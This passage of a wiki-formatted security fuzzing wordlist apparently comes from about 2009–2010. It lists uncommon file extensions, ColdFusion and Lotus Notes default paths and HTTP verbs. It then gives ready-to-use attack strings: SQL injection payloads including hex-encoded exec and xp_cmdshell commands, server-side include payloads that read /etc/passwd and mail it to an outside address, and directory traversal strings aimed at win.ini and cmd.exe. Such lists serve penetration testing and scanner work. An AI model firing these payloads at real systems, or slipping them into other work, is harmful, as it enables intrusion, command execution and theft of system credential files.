.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Uncommon Data File Extensions  (Update: 16 March 2009 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
